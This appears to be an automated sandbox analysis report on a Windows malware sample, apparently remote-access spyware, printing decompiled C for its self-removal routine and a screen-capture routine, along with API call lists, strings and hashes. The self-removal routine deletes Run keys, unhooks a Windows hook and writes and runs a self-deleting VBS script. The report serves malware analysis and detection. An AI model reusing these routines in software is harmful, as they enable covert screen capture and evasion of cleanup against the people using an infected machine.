                                                                                				if( *0x41ba20 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                                                                					_t305 = _t305 + 0xc;
                                                                                				}
                                                                                				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                                                                				_t306 = _t305 + 0x1c;
                                                                                				if(_t134 == 0) {
                                                                                					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                                                                				}
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				RegDeleteKeyA(0x80000001, _t134);
                                                                                				_v9 = 1;
                                                                                				_t137 = SetFileAttributesW( &_v644, 0x80);
                                                                                				if(_t137 == 0) {
                                                                                					_v9 = _v9 & _t137;
                                                                                				}
                                                                                				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                                                                				if(_t137 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					SetFileAttributesW(_t137, 0x80);
                                                                                				}
                                                                                				_t138 =  &_v10;
                                                                                				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                                                                				L00414146();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                                                                				_t140 =  &_v10;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                                                                				L0041416A();
                                                                                				_t308 = _t306 + 0x18;
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                                                                				if(_v9 != 0) {
                                                                                					_t157 =  &_v644;
                                                                                					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                                                                					_t158 =  &_v76;
                                                                                					L0041416A();
                                                                                					_t159 =  &_v28;
                                                                                					L00414146();
                                                                                					_t308 = _t308 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				_t285 = L"\"\n";
                                                                                				_t143 =  &_v10;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                                                                				_t144 =  &_v76;
                                                                                				L00414146();
                                                                                				_t145 =  &_v60;
                                                                                				L00414146();
                                                                                				_t310 = _t308 + 0x18;
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				if(_v9 != 0) {
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                                                                				}
                                                                                				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                                                                				if(_t145 != 0) {
                                                                                					_t154 =  &_v76;
                                                                                					L0041416A();
                                                                                					_t155 =  &_v60;
                                                                                					L00414146();
                                                                                					_t310 = _t310 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				_t146 =  &_v10;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                                                                				_t148 =  &_v9;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                                                                				_t149 =  &_v28;
                                                                                				L0041414C();
                                                                                				_t150 =  &_v76;
                                                                                				L0041414C();
                                                                                				_t151 =  &_v60;
                                                                                				L00414146();
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                                                                				if(_t153 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                                                                					if(_t153 > 0x20) {
                                                                                						exit(0);
                                                                                					}
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t153;
                                                                                			}




































































                                                                                0x00408850
                                                                                0x0040885a
                                                                                0x0040885e
                                                                                0x00408867
                                                                                0x00408870
                                                                                0x00408874
                                                                                0x00408879
                                                                                0x00408880
                                                                                0x00408889
                                                                                0x00408892
                                                                                0x00408892
                                                                                0x00408898
                                                                                0x004088a9
                                                                                0x004088b4
                                                                                0x004088c0
                                                                                0x004088c7
                                                                                0x004088cb
                                                                                0x004088d4
                                                                                0x004088d8
                                                                                0x004088e1
                                                                                0x004088e5
                                                                                0x004088f1
                                                                                0x004088fa
                                                                                0x00408903
                                                                                0x0040890c
                                                                                0x00408915
                                                                                0x0040891e
                                                                                0x0040892c
                                                                                0x00408938
                                                                                0x00408942
                                                                                0x0040894e
                                                                                0x00408955
                                                                                0x0040895f
                                                                                0x00408967
                                                                                0x00408974
                                                                                0x0040897d
                                                                                0x00408980
                                                                                0x00408980
                                                                                0x0040897d
                                                                                0x00408989
                                                                                0x00408992
                                                                                0x0040899b
                                                                                0x004089a5

                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                                                                  • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                                                                • _wgetenv.MSVCRT ref: 004083DA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                                                                • exit.MSVCRT ref: 004085A3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                                                • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                • API String ID: 4026913539-546584676
                                                                                • Opcode ID: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                                                                • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                                                                • Opcode Fuzzy Hash: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                                                                • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                                                                				struct HDC__* _v8;
                                                                                				void* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				char _v44;
                                                                                				intOrPtr _v50;
                                                                                				void* _v52;
                                                                                				void* _v54;
                                                                                				intOrPtr _v58;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				intOrPtr _v80;
                                                                                				struct tagCURSORINFO _v96;
                                                                                				signed int _v102;
                                                                                				signed int _v104;
                                                                                				long _v112;
                                                                                				long _v116;
                                                                                				char _v120;
                                                                                				struct _ICONINFO _v140;
                                                                                				int _t143;
                                                                                				void* _t144;
                                                                                				signed int _t153;
                                                                                				long _t164;
                                                                                				void* _t165;
                                                                                				char* _t189;
                                                                                				signed int _t193;
                                                                                				void* _t214;
                                                                                				signed int _t222;
                                                                                				signed char _t224;
                                                                                				signed int _t225;
                                                                                				signed int _t242;
                                                                                				struct HDC__* _t245;
                                                                                				int _t249;
                                                                                				struct tagBITMAPINFO* _t250;
                                                                                
                                                                                				_t214 = 0;
                                                                                				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                				_v16 = _t245;
                                                                                				_v8 = CreateCompatibleDC(_t245);
                                                                                				_t248 = 0x41bfc8 + _a12 * 4;
                                                                                				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                                                                				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                                                                				_v28 = _t143;
                                                                                				if(_v12 != 0 || _t143 != 0) {
                                                                                					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                                                                					_a12 = _t144;
                                                                                					if(_t144 != _t214) {
                                                                                						if(SelectObject(_v8, _t144) != 0) {
                                                                                							_v24 = _t214;
                                                                                							asm("stosd");
                                                                                							E0040FF57( *_t248,  &_v24);
                                                                                							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                                                                								if(_a8 != 0) {
                                                                                									_v96.cbSize = 0x14;
                                                                                									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                                                                										DeleteObject(_v140.hbmColor);
                                                                                										DeleteObject(_v140.hbmMask);
                                                                                										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                                                                										_t214 = 0;
                                                                                									}
                                                                                								}
                                                                                								_push( &_v120);
                                                                                								_t249 = 0x18;
                                                                                								if(GetObjectA(_a12, _t249, ??) != 0) {
                                                                                									_t153 = _v102 * _v104;
                                                                                									_t242 = 1;
                                                                                									if(_t153 != _t242) {
                                                                                										_t222 = 4;
                                                                                										if(_t153 > _t222) {
                                                                                											_t222 = 8;
                                                                                											if(_t153 <= _t222) {
                                                                                												goto L18;
                                                                                											}
                                                                                											_t222 = 0x10;
                                                                                											if(_t153 <= _t222) {
                                                                                												goto L18;
                                                                                											}
                                                                                											if(_t153 > _t249) {
                                                                                												_a8 = 0x20;
                                                                                												L28:
                                                                                												_push(0x28 + (_t242 << _a8) * 4);
                                                                                												L23:
                                                                                												_t250 = LocalAlloc(0x40, ??);
                                                                                												_t224 = _a8;
                                                                                												_t250->bmiHeader = 0x28;
                                                                                												_t250->bmiHeader.biWidth = _v116;
                                                                                												_t250->bmiHeader.biHeight = _v112;
                                                                                												_t250->bmiHeader.biPlanes = _v104;
                                                                                												_t250->bmiHeader.biBitCount = _v102;
                                                                                												if(_t224 < 0x18) {
                                                                                													_t193 = 1;
                                                                                													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                                                                												}
                                                                                												_t225 = 8;
                                                                                												asm("cdq");
                                                                                												_t250->bmiHeader.biCompression = _t214;
                                                                                												_t250->bmiHeader.biClrImportant = _t214;
                                                                                												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                                                                												_t250->bmiHeader.biSizeImage = _t164;
                                                                                												_t165 = GlobalAlloc(_t214, _t164);
                                                                                												_v12 = _t165;
                                                                                												if(_t165 != _t214) {
                                                                                													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                                                                														_v60 = 0x4d42;
                                                                                														_v54 = _t214;
                                                                                														_v52 = _t214;
                                                                                														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                                                                														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														DeleteObject(_a12);
                                                                                														GlobalFree(_v12);
                                                                                														DeleteDC(_v16);
                                                                                														DeleteDC(_v8);
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                                                                														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                														goto L33;
                                                                                													}
                                                                                													DeleteDC(_v16);
                                                                                													DeleteDC(_v8);
                                                                                													DeleteObject(_a12);
                                                                                													GlobalFree(_v12);
                                                                                													_t189 =  &_a11;
                                                                                												} else {
                                                                                													DeleteDC(_v16);
                                                                                													DeleteDC(_v8);
                                                                                													DeleteObject(_a12);
                                                                                													_t189 =  &_a11;
                                                                                												}
                                                                                												goto L31;
                                                                                											}
                                                                                											_a8 = _t249;
                                                                                											_push(0x28);
                                                                                											goto L23;
                                                                                										}
                                                                                										L18:
                                                                                										_a8 = _t222;
                                                                                										goto L28;
                                                                                									}
                                                                                									_a8 = _t242;
                                                                                									goto L28;
                                                                                								} else {
                                                                                									DeleteDC(_v16);
                                                                                									DeleteDC(_v8);
                                                                                									DeleteObject(_a12);
                                                                                									_t189 =  &_a11;
                                                                                									goto L31;
                                                                                								}
                                                                                							}
                                                                                							DeleteDC(_v16);
                                                                                							DeleteDC(_v8);
                                                                                							DeleteObject(_a12);
                                                                                							_t189 =  &_a11;
                                                                                							goto L31;
                                                                                						}
                                                                                						DeleteDC(_t245);
                                                                                						DeleteDC(_v8);
                                                                                						DeleteObject(_a12);
                                                                                						_t189 =  &_a11;
                                                                                						goto L31;
                                                                                					}
                                                                                					DeleteDC(_t245);
                                                                                					DeleteDC(_v8);
                                                                                					DeleteObject(_t214);
                                                                                					_t189 =  &_a11;
                                                                                					goto L31;
                                                                                				} else {
                                                                                					_t189 =  &_a11;
                                                                                					L31:
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                                                                					L33:
                                                                                					return _a4;
                                                                                				}
                                                                                			}








































                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                                                                  • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                                                                • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
